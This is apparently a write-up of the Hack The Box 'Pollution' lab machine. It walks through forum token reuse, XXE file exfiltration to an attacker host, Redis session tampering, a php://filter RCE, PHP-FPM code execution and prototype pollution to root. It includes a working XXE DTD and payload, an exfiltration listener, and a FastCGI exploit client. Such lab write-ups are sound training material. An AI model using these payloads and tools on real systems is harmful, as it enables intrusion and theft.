In this post, I would like to share a walkthrough of the Pollution machine from Hack The Box.


This machine is rated Hard on Hack The Box.

What will you gain from the Pollution machine?


For the user flag, we enumerate the website with Burp Suite and find a forum attachment (a proxy history export) containing a request and a token that let us give our own account admin privileges on the site. The admin functionality forwards XML to the Pollution API, which is vulnerable to XML external entity (XXE) injection, and we use that to read files off the server. Those files give us access to the Redis server, which we modify to get into the developers site. On the developers site we exploit a PHP filter injection to obtain a reverse shell.


For the root flag, we exploit a prototype pollution vulnerability in the Pollution API to get code execution as root and, from there, a root shell.

Information Gathering on Pollution Machine


Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we start information gathering on the machine with nmap -sC -sV -Pn <IP Address>. The -Pn flag (older nmap versions spell it -PN) skips host discovery and scans the target even if it does not answer ping.


Let's open the website in a browser.


The site offers little beyond a login and a registration function.


Therefore, let's register a new account, as shown in the screenshot above.


Let's log in with the credentials we just created.


We land on the home page, which confirms that registration and login work.


Virtual-host enumeration with gobuster reveals two additional subdomains, forum.collect.htb and developers.collect.htb, which we add to /etc/hosts so they resolve to the machine.


The screenshot above shows the forum's landing page.


Sadly, we have no credentials to log in with here.

Enumerate the subdomain “forum.collect.htb”


Browsing the forum, I notice a few users in the member list.


Let's register an account on the forum.


We are now registered and logged in to the forum dashboard.


One post by Victor, titled roughly "I am unable to login to the Pollution API", stands out.


As shown in the screenshot above, Victor attached a proxy_history file to the post, a Burp Suite proxy history export.


Inside the proxy_history file the requests and responses are base64-encoded; decoding them turns up something useful.


One of the decoded requests sets an account's role to admin, and it carries the token that authorises that change.


The screenshot above shows the original request to collect.htb.


We replay that request through Burp Suite, substituting our own account, to set our role to admin.
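Decoding a Burp proxy history export by hand is tedious when it holds dozens of items. The script below is an added example, not the author's tooling: it parses the export layout Burp uses (items with url, method, request and response children, the latter base64-flagged), decodes each request, and lists the ones that mention a token or a role. The embedded sample history is constructed; the /set/role path and the PLACEHOLDER_TOKEN value are placeholders, not the request from Victor's file.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the layout of a Burp Suite proxy-history export.
# These are not Victor's real requests: /set/role and the token are placeholders.
_REQ_GET = b"GET / HTTP/1.1\r\nHost: collect.htb\r\n\r\n"
_RESP_GET = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>home</html>"
_REQ_ROLE = (b"POST /set/role HTTP/1.1\r\nHost: collect.htb\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             b"token=PLACEHOLDER_TOKEN&role=admin")
_RESP_ROLE = b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"ok\":true}"

SAMPLE_HISTORY = f"""<?xml version="1.0"?>
<items>
  <item>
    <url>http://collect.htb/</url>
    <method base64="false">GET</method>
    <request base64="true">{base64.b64encode(_REQ_GET).decode()}</request>
    <response base64="true">{base64.b64encode(_RESP_GET).decode()}</response>
  </item>
  <item>
    <url>http://collect.htb/set/role</url>
    <method base64="false">POST</method>
    <request base64="true">{base64.b64encode(_REQ_ROLE).decode()}</request>
    <response base64="true">{base64.b64encode(_RESP_ROLE).decode()}</response>
  </item>
</items>"""


def _field(item, tag):
    """Return a child element's content as bytes, base64-decoding it when Burp flagged it so."""
    elem = item.find(tag)
    if elem is None or elem.text is None:
        return b""
    if elem.get("base64") == "true":
        return base64.b64decode(elem.text.strip())
    return elem.text.encode()


def parse_history(xml_text):
    """Parse a Burp proxy-history export into a list of {url, method, request, response}."""
    root = ET.fromstring(xml_text)
    return [{
        "url": (item.findtext("url") or "").strip(),
        "method": _field(item, "method").decode(errors="replace"),
        "request": _field(item, "request"),
        "response": _field(item, "response"),
    } for item in root.iter("item")]


def find_interesting(items, keywords=("token", "role", "admin", "password")):
    """Return the items whose decoded request mentions any of the keywords (case-insensitive)."""
    hits = []
    for item in items:
        body = item["request"].lower()
        if any(k.encode() in body for k in keywords):
            hits.append(item)
    return hits


if __name__ == "__main__":
    import sys
    # usage: python3 burp_history.py proxy_history.xml   (falls back to the sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for item in find_interesting(parse_history(text)):
        print(f"== {item['method']} {item['url']}")
        print(item["request"].decode(errors="replace"))
        print()
```

Python's ElementTree does not resolve external entities, so parsing an untrusted export this way is safe; the interesting request, with its token, can then be pasted into Burp Repeater.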


At last, we can reach the admin page on collect.htb.


The screenshot above shows the admin interface in the browser.

XXE attack on the machine


The admin page has an XXE vulnerability we can take advantage of: its manage_api function forwards an XML document (the manage_api parameter) to the Pollution API, and the parser on the other side resolves external entities.


Registering a username that is already taken returns "The user already exists", which confirms that the XML we submit is parsed and acted upon.


Let's start a Python HTTP server on our own machine to host the external DTD and to receive the exfiltrated data.

<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../index.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<IP ADDRESS>/?file=%file;'>">
%eval;
%exfiltrate;

The external DTD (dark.dtd) is shown above. The file entity reads ../index.php through the php://filter wrapper with convert.base64-encode, so the file contents become a single token that survives inside a URL, and the exfiltrate entity sends that token to our server as a query parameter. This out-of-band technique works even when the API response does not echo the entity contents.


We execute the XXE attack with the payload below, which pulls in our DTD and then issues an ordinary register request so the API still processes the document:

manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP ADDRESS>/dark.dtd"> %xxe;]><root>
<method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>

By changing the resource= path in the DTD we can retrieve any file the web server user can read; it is delivered to the HTTP server on our attacking machine, base64-encoded in the query string.
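A plain python3 -m http.server shows the callback in its log, but the base64 blob then has to be copied out and decoded by hand. The listener below is an added example, not the author's tooling: it serves the DTD (with the target's own Host header as the callback address, so the listener IP is never hard-coded), and decodes every ?file= callback it receives. The nested entity is written with &#x25; rather than a bare %, which is valid in both the internal and the external subset. The default resource, port and file name (dark.dtd) follow the text above; the padding and '+' handling are the details that commonly break a hand-rolled decoder.

```python
import base64
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

# External DTD in the shape of the one above; {listener} and {resource} are filled at runtime.
DTD_TEMPLATE = (
    "<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource={resource}'>\n"
    "<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM 'http://{listener}/?file=%file;'>\">\n"
    "%eval;\n"
    "%exfiltrate;\n"
)


def decode_exfil(request_path):
    """Extract and base64-decode the ?file= parameter of an exfiltration callback.

    Returns None when the request has no file parameter (e.g. the DTD fetch itself).
    The query string is split by hand: urllib's parse_qs would turn base64's '+' into a space.
    """
    query = urlparse(request_path).query
    for part in query.split("&"):
        if part.startswith("file="):
            data = unquote(part[len("file="):])          # undo %-encoding, keep '+' as is
            data += "=" * (-len(data) % 4)               # restore padding the target may drop
            return base64.b64decode(data)
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    resource = "../index.php"   # what the target should read; overridden via argv

    def do_GET(self):
        if self.path.endswith(".dtd"):
            # The target's request carries our address in Host; reuse it for the callback URL.
            listener = self.headers.get("Host", "127.0.0.1")
            body = DTD_TEMPLATE.format(resource=self.resource, listener=listener).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        content = decode_exfil(self.path)
        if content is not None:
            sys.stdout.write(f"--- exfiltrated {self.resource} ({len(content)} bytes) ---\n")
            sys.stdout.write(content.decode("utf-8", errors="replace") + "\n")
            sys.stdout.flush()
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    # usage: python3 xxe_listener.py [port] [resource]   e.g.  python3 xxe_listener.py 80 ../index.php
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80
    if len(sys.argv) > 2:
        ExfilHandler.resource = sys.argv[2]
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Point the payload's DTD URL at this listener and the decoded file prints to the terminal as soon as the API resolves the entities.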


The exfiltrated file contains a password hash.


The hash is in Apache MD5 (apr1) format, which is hashcat mode 1600.


Cracking it gives us a password.

Redis-Cli command


Let's connect to the Redis server with redis-cli, as shown in the screenshot above.


Using that access, we edit the data Redis holds for our own user "darknite" so it gets the permissions the admin has.


At last, we can access the developers dashboard with those credentials.
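The page does not show the layout of the Redis entry that was edited. The script below is an added example, not the author's commands, and it rests on an assumption: that the developers site stores PHP sessions in Redis in PHP's native session format (name|value records, each value written with serialize(), which is what the phpredis session handler stores). It parses such a blob, flips one field and re-serialises the rest untouched. The sample blob and the field name auth are constructed for the example; the real key name, session id and field are whatever the screenshot shows.

```python
import sys

# Constructed sample blob in PHP's native session format; the field names are assumptions.
SAMPLE_SESSION = 'username|s:8:"darknite";auth|b:0;'


def _unserialize(data, i=0):
    """Parse one PHP serialize() value at data[i:]; return (python_value, index_after_value).
    Handles N, b, i, d, s and a; string lengths are byte counts, so ASCII is assumed."""
    t = data[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "bid":                                 # b:1;  i:42;  d:1.5;
        end = data.index(";", i)
        raw = data[i + 2:end]
        value = {"b": lambda r: r == "1", "i": int, "d": float}[t](raw)
        return value, end + 1
    if t == "s":                                   # s:5:"hello";
        colon = data.index(":", i + 2)
        length = int(data[i + 2:colon])
        start = colon + 2                          # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:1:{i:0;s:4:"user";}
        colon = data.index(":", i + 2)
        count = int(data[i + 2:colon])
        j = colon + 2                              # skip :{
        result = {}
        for _ in range(count):
            key, j = _unserialize(data, j)
            value, j = _unserialize(data, j)
            result[key] = value
        return result, j + 1                       # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {i}")


def php_serialize(value):
    """Inverse of _unserialize for the same subset of types."""
    if value is None:
        return "N;"
    if isinstance(value, bool):                    # before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"cannot serialize {type(value).__name__}")


def parse_php_session(raw):
    """Split a native-format PHP session blob into {name: value}, preserving order."""
    session, i = {}, 0
    while i < len(raw):
        bar = raw.index("|", i)                    # a record is name|serialized-value
        name = raw[i:bar]
        session[name], i = _unserialize(raw, bar + 1)
    return session


def set_session_value(raw, name, value):
    """Return the blob with `name` set to `value` (added if absent); other fields are kept."""
    session = parse_php_session(raw)
    session[name] = value
    return "".join(f"{k}|{php_serialize(v)}" for k, v in session.items())


if __name__ == "__main__":
    # usage: python3 php_session.py '<blob from redis-cli GET <session key>>'
    blob = sys.argv[1] if len(sys.argv) > 1 else SAMPLE_SESSION
    print(set_session_value(blob, "auth", True))
```

The workflow is redis-cli GET on the session key, the script to rewrite the blob, and redis-cli SET with the result; the session cookie in the browser must belong to the same session id, otherwise the site will read a different key.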


Next we need a file containing a reverse shell, which we will serve from our own machine.


So let's start our Python HTTP server again.


We generate a php://filter chain that injects a phpinfo() call, a harmless test that visibly shows whether the chain is being evaluated. The chain abuses convert.iconv.* filters to prepend arbitrary bytes to whatever resource is included, so a file inclusion sink becomes PHP code execution without writing anything to disk.


Boom! The phpinfo() page renders, so the filter chain works.


Let's try command execution the same way.


As expected, it works and returns "www-data", the web server user.


Now replace the command with one that curls our reverse shell script from our HTTP server and pipes it to bash.


Our HTTP server log confirms that the target fetched the file.


And we have a reverse shell on the machine.


There are a bunch of PHP files worth investigating.

Enumerate the MySQL database


One of the PHP files contains the MySQL database password.


Let's log in to MySQL with those credentials.


However, there is nothing in this database that we can use.


Looking at the ports open on the machine, I notice one that is not commonly exposed: it turns out to be PHP-FPM's FastCGI listener (port 9000 by default).


We transfer fpm.py (downloaded from here) to the machine.


The command above should work out of the box, but it fails with "File not found": PHP-FPM requires the SCRIPT_FILENAME parameter to point at a PHP file that actually exists on disk before it will run anything.


So we create the file "darknite.php" and point the script at it.


Boom! We have command execution on the machine through FastCGI.
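What fpm.py does under the hood is worth seeing once, because the "File not found" step only makes sense at the protocol level. The client below is an added example (not the fpm.py the page links to, although it uses the same trick): it speaks FastCGI to an exposed PHP-FPM port, sets PHP_VALUE to auto_prepend_file = php://input and PHP_ADMIN_VALUE to allow_url_include = On, and sends the PHP code as the request body, so FPM prepends and executes it while serving the existing script named in SCRIPT_FILENAME. The record encoder and decoder are complete, so the request can be inspected offline; the script path in the usage line is a placeholder, not a path from the machine.

```python
import socket
import struct
import sys

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_END_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 3, 4, 5
FCGI_STDOUT, FCGI_STDERR = 6, 7
FCGI_RESPONDER = 1


def encode_record(rec_type, content, request_id=1):
    """Wrap content in a FastCGI record: 8-byte header, content, padding to an 8-byte boundary."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION, rec_type, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def _encode_length(n):
    """Name/value lengths use 1 byte below 128, otherwise 4 bytes with the high bit set."""
    return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)


def _decode_length(buf, i):
    if buf[i] < 128:
        return buf[i], i + 1
    return struct.unpack(">I", buf[i:i + 4])[0] & 0x7FFFFFFF, i + 4


def encode_params(params):
    """Serialise a dict into FCGI_PARAMS name-value pairs."""
    out = b""
    for name, value in params.items():
        name_b, value_b = name.encode(), value.encode()
        out += _encode_length(len(name_b)) + _encode_length(len(value_b)) + name_b + value_b
    return out


def decode_params(content):
    """Inverse of encode_params, useful for checking what was actually sent."""
    params, i = {}, 0
    while i < len(content):
        name_len, i = _decode_length(content, i)
        value_len, i = _decode_length(content, i)
        params[content[i:i + name_len].decode()] = content[i + name_len:i + name_len + value_len].decode()
        i += name_len + value_len
    return params


def build_request(script_filename, php_code, request_id=1):
    """Byte stream for one FPM request that runs php_code before the script in script_filename.
    The script must exist on the target, otherwise FPM replies "File not found"."""
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_filename,
        "SCRIPT_NAME": script_filename.rsplit("/", 1)[-1],
        "CONTENT_LENGTH": str(len(php_code.encode())),
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "SERVER_NAME": "localhost",
        "REMOTE_ADDR": "127.0.0.1",
        # The two settings that turn an exposed FPM socket into code execution:
        "PHP_VALUE": "auto_prepend_file = php://input",
        "PHP_ADMIN_VALUE": "allow_url_include = On",
    }
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)          # role=RESPONDER, flags=0
    stream = encode_record(FCGI_BEGIN_REQUEST, begin, request_id)
    stream += encode_record(FCGI_PARAMS, encode_params(params), request_id)
    stream += encode_record(FCGI_PARAMS, b"", request_id)      # empty record ends the params
    stream += encode_record(FCGI_STDIN, php_code.encode(), request_id)
    stream += encode_record(FCGI_STDIN, b"", request_id)       # empty record ends stdin
    return stream


def parse_records(data):
    """Split a FastCGI byte stream into (type, content) tuples, skipping padding."""
    records, i = [], 0
    while i + 8 <= len(data):
        _version, rec_type, _req_id, length, padding = struct.unpack(">BBHHBx", data[i:i + 8])
        records.append((rec_type, data[i + 8:i + 8 + length]))
        i += 8 + length + padding
    return records


def send_request(host, port, script_filename, php_code, timeout=10):
    """Deliver the request to an exposed PHP-FPM port and return what PHP wrote to stdout."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(script_filename, php_code))
        while not any(t == FCGI_END_REQUEST for t, _ in parse_records(data)):
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return b"".join(c for t, c in parse_records(data) if t == FCGI_STDOUT).decode(errors="replace")


if __name__ == "__main__":
    # usage: python3 fcgi_client.py <host> <port> </existing/path/darknite.php> "<?php system('id'); ?>"
    print(send_request(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]))
```

The returned text includes the CGI headers PHP emits before the body; the command output appears after the blank line.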


Let's use that to add our own SSH public key to the machine.


Finally, we can access the machine over SSH.


We can read the user flag with the "cat user.txt" command.

Another method to get a foothold on pollution machine


Sadly, the Python script no longer worked when I tested it again before releasing this write-up.


We can see a bash process running as the user Victor.


We create a bash file with the contents shown above; the script can be found here.


Running that file should give us a reverse connection.


Finally, we get the reverse shell connection back to us.

Escalate to Root Privileges Access


While roaming the machine, I found a pollution_api directory that we can investigate.


We can log back into MySQL, this time looking at the pollution_api database.


It has two tables; the users table is the one worth investigating.


There are no credentials to reuse in the users table, but we can change the roles stored there instead.


The command above updates our user in the database from a normal role to the admin role.


With the admin role in place, we trigger the vulnerable API endpoint with curl. Prototype pollution happens when the API merges attacker-controlled JSON into an object without filtering keys such as __proto__: the injected properties land on Object.prototype and are inherited by every object in the process, and a property that the code later reads from one of those objects turns the pollution into command execution.


Boom! /bin/bash is now a SUID root binary, so running bash -p (which keeps the effective UID) gives us a root shell.


We can read the root flag with the "cat /root/root.txt" command.

Extra Information